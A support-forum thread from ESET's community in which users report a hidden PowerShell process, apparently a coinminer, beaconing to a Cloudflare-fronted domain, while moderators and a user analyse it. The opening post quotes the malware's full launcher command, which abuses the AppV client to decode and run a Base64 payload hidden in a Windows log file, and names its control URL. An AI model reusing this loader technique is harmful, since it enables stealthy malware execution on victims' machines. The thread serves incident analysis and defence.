Jump to content

Two strange powershell processes (maybe coinminers?)


Recommended Posts

Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today.

  1. Conhost.exe and powershell.exe was running background, but I didn't run each of them.
  2. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity.
  3. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves.
  4. I use ESET SysInspector to captured a snapshot.

I used nslookup to reslove:

C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时

C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1

非权威应答:
名称:    api.private-chatting.com
Addresses:  2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214

__Today__

  1.  I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}

      2. Find C:\Windows\logs\system-logs.txt , find these strings


Snipped: The code was moved to the the attached file to squeeze the post.

 

Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";

It's as same as the URL in pcapng file.

powershell command line in task manager.png

powershell.exe using internet.PNG

private-chatting.com.png

system-logs.txt Strange traffic_20220424.rar

system-logs.rar

Edited by Marcos
Script moved to an attached file
Link to comment
Share on other sites

hi i have the same process.

how remove it.

i try disable powershell ect... but nothing.

have lock ip in firewall same now new.

how can i do for remove pls ???

ty

 

execute nod32 but found nothing

2606:4700:3032::6815:38d6:801743769876_Ashampoo_Snap_mercredi27avril2022_20h43m57s_003_AdministrateurCWindowsSystem32cmd_exe.png.69c1d119946ac7be2f0b34d74637175c.png1981065909_Ashampoo_Snap_mercredi27avril2022_20h37m27s_002_Gnr-ESETSysInspector.png.ddf610e0b0c2938414a0b475782fed1a.png

 

Ashampoo_Snap_mercredi 27 avril 2022_20h46m29s_004_powershell.exe1540 Properties.png

Link to comment
Share on other sites

  • Administrators

You should find out the PowerShell script that was executed. Most likely it's legitimate which is also why it wasn't detected and there's no reason to be concerned.

Please provide logs collected with ESET Log Collector for a check.

Link to comment
Share on other sites

47 minutes ago, ca81 said:

2606:4700:3032::6815:38d6:801743769876_Ashampoo_Snap_mercredi27avril2022_20h43m57s_003_AdministrateurCWindowsSystem32cmd_exe.png.69c1d119946ac7be2f0b34d74637175c.png1981065909_Ashampoo_Snap_mercredi27avril2022_20h37m27s_002_Gnr-ESETSysInspector.png.ddf610e0b0c2938414a0b475782fed1a.png

 

Ashampoo_Snap_mercredi 27 avril 2022_20h46m29s_004_powershell.exe1540 Properties.png

Notice the remote IPv6 address is the same as previously posted that was detected performing coinmining activity.

Also, it is not normal Win system behavior to see PowerShell running as a stand-alone task for an extended period of time.

Edited by itman
Link to comment
Share on other sites

In regard to the prior PowerShell code posted:

Eset_Coinminer.png.991612a1eee41b05c5a6d62146a2de34.png

Attacker dropped the coinminer code file previously in highlighted Windows log file directory. Attacker is creating App_V process remotely using Sync-AppPublishingServer.

Link to comment
Share on other sites

I am going through the exact same thing and if this is indeed malicious, what could be done to remove it? Could you possible give a solution please? thank you!

Link to comment
Share on other sites

  • Administrators
3 minutes ago, Soul said:

I am going through the exact same thing and if this is indeed malicious, what could be done to remove it? Could you possible give a solution please? thank you!

Please provide logs collected with ESET Log Collector for a start.

Link to comment
Share on other sites

It is exactly the same stuff above. Exact same ip addresses and the api.chatting thing. Exact same shell command that is causing powershell to run in the background. What Itman posted is the shell command being executed.

Edited by Soul
Link to comment
Share on other sites

  • Administrators

C:\Windows\logs\system-logs.txt should be detected. Please scan it with ESET. If not detected, supply it to me please.

Link to comment
Share on other sites

sorry im a little confused. Which log file should i be giving you. I scanned the system_log file with eset and it said it was fine.

Link to comment
Share on other sites

yea i could do that. Also to add to this, I restarted my computer and ESET did block the script that was running but i want more of a permanent solution if thats possible. To fully remove whats even initiating that script to open to begin with

Link to comment
Share on other sites

  • Administrators
23 minutes ago, Soul said:

yea i could do that. Also to add to this, I restarted my computer and ESET did block the script that was running but i want more of a permanent solution if thats possible. To fully remove whats even initiating that script to open to begin with

According to the logs provided you don't have ESET installed.

On the other hand, there's an install log from yesterday that reads:
(SERVER)     MSI (s) (80:C4) [22:51:31:369]: Product: ESET Security -- Installation completed successfully.
(SERVER)     MSI (s) (80:C4) [22:51:31:370]: Windows Installer installed the product. Product Name: ESET Security. Product Version: 15.1.12.0. Product Language: 1033. Manufacturer: ESET, spol. s r.o.. Installation success or error status: 0.

That said, it looks like ESET was uninstalled prior to collecting the logs.

Link to comment
Share on other sites

I did but i removed because i wanted to see if the script it blocked was permanent or temp and i couldnt turn it off so i uninstalled it and the script executed.

Link to comment
Share on other sites

  • Administrators

You can upload it to a file sharing service, such as OneDrive, Dropbox, etc. and drop me a private message with a download link.

Link to comment
Share on other sites

7 hours ago, Marcos said:

This is an actual log. Did you send a correct file?

Assume the file containing the Base64 encrypted coinminer code could be dropped anywhere. The attacker could actually now be creating a diversion where he is dropping two files; one being a legit system-logs.txt log file.

Also assume that since the file dropping is occurring prior to PowerShell execution, the coinminer code is being altered to defeat signature detection.

Appears to me a reverse shell has been created which is the source of the above activity. The key to stopping this coinminer is to find the reverse shell and create a sig. for it. Most likely for the attacker IP address being dialed out to.

My advice is create an Eset HIPS ask rule to monitor PowerShell.exe startup. Make sure alerting and log level of warning are specified. Hopefully this will point to what is running the script. Not sure here if the HIPS will detect the remote execution of the script. This HIPS ask rule should not cause issues for home users who would not be deploying PowerShell scripts for anything.

Edited by itman
Link to comment
Share on other sites

I am also going to perform a "connecting of the dots" exercise here:

1. The PowerShell script is signed.

2. The IP addresses being used track to Cloudflare.

3. Incident reports to date are China, France, and the U.S..

4 The OP who started the thread stated a CPU usage spike of 10%; a low rate for coin miners.

5. PowerShell execution is not hidden in the least.

Putting it all together strongly points to a legit software install that is performing coin mining. Hell, even Norton AV is doing it currently: https://www.theverge.com/2022/1/7/22869528/norton-crypto-miner-security-software-reaction .

Edited by itman
Link to comment
Share on other sites

Another thing I noticed from the OP's screen shot of running tasks is that he has WMware installed. The PowerShell script is loading the AppVClient. Finally, WMware has recent postings of RCE vulnerabilities: https://www.vmware.com/security/advisories/VMSA-2022-0010.html .

One of these RCE vulnerabilites is currently being exploited: https://thehackernews.com/2022/04/iranian-hackers-exploiting-vmware-rce.html and PowerShell is part of the attack.

More details here:

Quote

Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons. With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR). 

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor .

Edited by itman
Link to comment
Share on other sites

  • Administrators

The OP has just installed ESET and it detected a PowerShell malware:

image.png.71aecc546c6c0c8a494c461308e2dc64.png

Since then I haven't heard if the threat has been resolved or not.

Link to comment
Share on other sites

1 hour ago, Marcos said:

The OP has just installed ESET and it detected a PowerShell malware:

image.png.71aecc546c6c0c8a494c461308e2dc64.png

Since then I haven't heard if the threat has been resolved or not.

The threat was detected at 25 14:42:11 and 26 06:24:28 (after system start), but it no longer detected after that.

Edited by Kevin999
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...